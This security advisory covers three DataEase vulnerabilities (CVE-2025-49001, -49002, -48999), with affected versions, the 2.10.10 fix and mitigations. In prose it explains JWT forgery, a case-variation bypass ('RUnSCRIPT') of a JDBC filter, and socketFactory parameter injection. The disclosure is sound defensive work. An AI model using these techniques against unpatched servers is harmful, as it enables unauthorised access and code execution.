Multiple vulnerabilities reported in DataEase Platform exposing risk of system compromise

DataEase, an open-source business intelligence and data visualization platform, is reporting multiple security vulnerabilities that enable attackers to achieve  system compromise. 

Vulnerabilities summary:

• CVE-2025-49001 (CVSS score 9.8): Authentication Bypass Vulnerability. Due to a flaw in the JWT algorithm implementation, an unauthenticated attacker can forge a JWT token using an arbitrary secret to bypass permission verification and access system backend functions. Allows attackers to craft tokens with arbitrary secrets while maintaining the required format containing user ID and organization ID claims. The vulnerability occurs because the authentication verification process continues executing even when token validation fails
• CVE-2025-49002  (CVSS score 9.8): Remote Code Execution Bypass Vulnerability. Due to a defect in the CVE-2025-32966 patch, the H2 database module does not strictly filter JDBC connection parameters entered by users, allowing authenticated attackers to bypass the patch using case sensitivity variations to achieve code execution. Attackers can use variations like "RUnSCRIPT" instead of "RUNSCRIPT" to circumvent filtering mechanisms, enabling them to inject malicious SQL commands that load external scripts containing Spring Framework-based payloads for remote code execution.
• CVE-2025-48999  (CVSS score 8.8): Remote Code Execution Vulnerability. A flaw in the getUrlType() function allows authenticated attackers to construct malicious JDBC statements that execute arbitrary Java code and gain server privileges by bypassing the CVE-2025-46566 patch. By exploiting flaws in hostname validation logic, attackers can inject parameters such as socketFactory specifications that trigger the loading of malicious XML configurations, ultimately leading to arbitrary code execution.

Affected Versions: 

DataEase Community Edition (CE) and Enterprise Edition (EE) versions up to and including 2.10.8 are affected by CVE-2025-49001 and CVE-2025-49002. CVE-2025-48999 affects versions up to and including 2.10.9.

Patched Versions: 

All three vulnerabilities have been addressed in DataEase version 2.10.10 and later releases.

For users who can't patch, mitigation measures include deploying web application firewalls to intercept malicious JDBC payload patterns, restricting outbound network access to prevent external resource connections via JDBC, and limiting access to DataEase instances to prevent exposure to untrusted networks. Organizations should avoid exposing DataEase platforms directly to the public internet whenever possible.